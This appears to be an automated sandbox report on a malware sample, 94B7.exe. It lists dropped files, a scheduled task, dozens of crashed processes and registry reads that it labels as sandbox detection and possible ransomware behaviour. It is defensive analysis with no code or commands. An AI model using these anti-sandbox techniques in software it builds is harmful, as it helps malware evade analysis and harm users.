94B7.exe 94B7.exe -
Drops file in Program Files directory 64 IoCs
Processes:
IBInstaller_74449.tmpWerFault.exeMaskVPNUpdate.exemsiexec.exeBearVpn 3.exeultramediaburner.tmpsvchost.exe46807GHF____.execb9ME0QxSe9LyFuukchnURzj.exedescription ioc process File opened for modification C:\Program Files (x86)\Vela Netw Limited\ucrtbased.dll IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\libcueify.dll IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-2A9C0.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-R8UQG.tmp WerFault.exe File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File created C:\Program Files (x86)\pupsik\My Product Name\35.exe msiexec.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe BearVpn 3.exe File created C:\Program Files (x86)\Vela Netw Limited\is-GJG5T.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\MaskVPN\is-SB9B6.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-QBLDQ.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-K7LTP.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-AEPL0.tmp WerFault.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe BearVpn 3.exe File created C:\Program Files (x86)\UltraMediaBurner\is-JJ4J7.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-QIQ0O.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1CB07.tmp WerFault.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat svchost.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat svchost.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-ILAJA.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-L0DSQ.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-8ELC6.tmp WerFault.exe File created C:\Program Files (x86)\pupsik\My Product Name\f.exe msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-KKG6P.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QP7EH.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-69MH4.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-LKPFO.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IEE02.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\unins000.msg WerFault.exe File created C:\Program Files (x86)\Common Files\Bomaemuryzho.exe 46807GHF____.exe File created C:\Program Files (x86)\Vela Netw Limited\unins000.dat IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-1JKC1.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-HFGSC.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\MaskVPN\is-N2NRE.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-42R8C.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-VK051.tmp WerFault.exe File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat WerFault.exe File created C:\Program Files (x86)\Vela Netw Limited\is-BRBCS.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\Vela Netw Limited\is-RBG21.tmp IBInstaller_74449.tmp File created C:\Program Files (x86)\MaskVPN\is-0LASS.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-J515Q.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-234QU.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-7F80V.tmp WerFault.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cb9ME0QxSe9LyFuukchnURzj.exe File created C:\Program Files (x86)\UltraMediaBurner\is-302TH.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\is-L059A.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-OMR92.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-RQJHQ.tmp WerFault.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-AIFBS.tmp WerFault.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cb9ME0QxSe9LyFuukchnURzj.exe File opened for modification C:\Program Files (x86)\Vela Netw Limited\VCItems.dll IBInstaller_74449.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-AUP78.tmp WerFault.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe WerFault.exe File created C:\Program Files (x86)\MaskVPN\unins000.dat WerFault.exe File created C:\Program Files (x86)\MaskVPN\is-J9C7E.tmp WerFault.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url BearVpn 3.exe File created C:\Program Files\Windows NT\CIWQIJMVKZ\ultramediaburner.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exeDrvInst.exeMSI50ED.tmpexpand.exesvchost.exeMsiExec.exetapinstall.exeConhost.exedescription ioc process File opened for modification C:\Windows\Installer\MSID715.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI30AB.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF590C6A1378C0FCCF.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5ED8.tmp msiexec.exe File opened for modification C:\Windows\Installer\f74ce42.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF72110EC118A9164D.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI2A9E.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF20A883E07B7A971B.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log MSI50ED.tmp File opened for modification C:\Windows\Installer\MSI1D0E.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFAFE3E64633FEDB08.TMP msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\SystemTemp\~DFB08E044119840536.TMP msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f74ce45.msi msiexec.exe File created C:\Windows\Installer\{3D02CD4C-367D-48D1-87A3-16384FD92B0A}\ARPPRODUCTICON.exe msiexec.exe File opened for modification C:\Windows\Installer\MSID2D8.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF64014612477491F2.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIDE0F.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI357E.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\Installer\SourceHash{3D02CD4C-367D-48D1-87A3-16384FD92B0A} msiexec.exe File opened for modification C:\Windows\Installer\MSI50DC.tmp msiexec.exe File created C:\Windows\Installer\f74ce4b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID338.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID510.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID8EB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDA16.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDA15.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File created C:\Windows\SystemTemp\~DFFC4FF3D959EC8FCA.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF285B25E83183961B.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF40AB8DE8C07B1C75.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIDF97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEA05.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1E57.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF48EF3C7E55D206FA.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSID398.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\f74ce49.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI50ED.tmp msiexec.exe File created C:\Windows\Installer\f74ce42.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID299.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1954.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI754F.tmp msiexec.exe File opened for modification C:\Windows\Installer\f74ce45.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1471.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2E87.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF5956F4BE711E2EF3.TMP msiexec.exe File opened for modification C:\Windows\Installer\{3D02CD4C-367D-48D1-87A3-16384FD92B0A}\ARPPRODUCTICON.exe msiexec.exe File opened for modification C:\Windows\Installer\MSID368.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2492.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB9A0.tmp msiexec.exe File created C:\Windows\Installer\f74ce49.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log Conhost.exe File opened for modification C:\Windows\Installer\MSI3BF7.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 37 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5680 4208 WerFault.exe Thu21df5caa1b78de6.exe 4708 2112 WerFault.exe Thu214ce31cede21.exe 6104 456 WerFault.exe Thu21624565bb917a.exe 5956 1132 WerFault.exe Thu2164f292a11ce.exe 1600 1404 WerFault.exe Thu21a1ef054cac78a.exe 476 1112 WerFault.exe setup.exe 3312 4116 WerFault.exe 2.exe 5220 5336 WerFault.exe udptest.exe 6944 6804 WerFault.exe rundll32.exe 7060 5524 WerFault.exe 4205929.exe 6896 5712 WerFault.exe 2218437.exe 6544 6516 WerFault.exe 7790881.exe 660 5020 WerFault.exe rundll32.exe 5796 6808 WerFault.exe GcleanerEU.exe 1904 5608 WerFault.exe gcleaner.exe 1856 3988 WerFault.exe rundll32.exe 2140 6256 WerFault.exe vdi_compiler.exe 3904 1216 WerFault.exe askinstall45.exe 504 5264 WerFault.exe 028d53f5224f9cc8c60bd953504f1efa.exe 6032 5728 WerFault.exe cydo4oNKIvLkAEThaBw1zqxy.exe 240 4172 WerFault.exe 1Z0zZmTCS5oMVXRfdl0oicGa.exe 5636 5308 WerFault.exe TuFgENVO9VJPbqex5eHA0cK1.exe 5904 1852 WerFault.exe _EGDhWSthk7tStn9F4Mb37kk.exe 4384 1372 WerFault.exe XI82U9g2elUXtS3Xbpjnmnqs.exe 6296 6608 WerFault.exe Ky9cjkHvbN1ZZPu6s15t_GEW.exe 1696 7016 WerFault.exe PDbz91bUg9M7aGBRtrVqnWej.exe 6696 3828 WerFault.exe 6399518.exe 2880 2608 WerFault.exe 2985193.exe 5536 940 WerFault.exe A710.exe 5016 1052 WerFault.exe B48E.exe 4252 6400 WerFault.exe 5EC.exe 2020 5236 WerFault.exe 35A9.exe 1568 1808 WerFault.exe 8748.exe 448 3108 WerFault.exe 7B41.exe 5392 3168 WerFault.exe 94B7.exe 5604 3108 WerFault.exe 7B41.exe 1696 3168 WerFault.exe 94B7.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Cleanpro12.exeDrvInst.exetapinstall.exesvchost.exeMSI50ED.tmptapinstall.exebWPeeD60Vsu4ib9lxUilR8TX.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service MSI50ED.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Filters MSI50ED.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Cleanpro12.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bWPeeD60Vsu4ib9lxUilR8TX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 MSI50ED.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters MSI50ED.tmp Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters MSI50ED.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Cleanpro12.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Cleanpro12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Cleanpro12.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeCleaner.exemshta.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execonhost.exeWerFault.exeWerFault.exeCleaner.exeWerFault.exeWerFault.exe4790483.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe 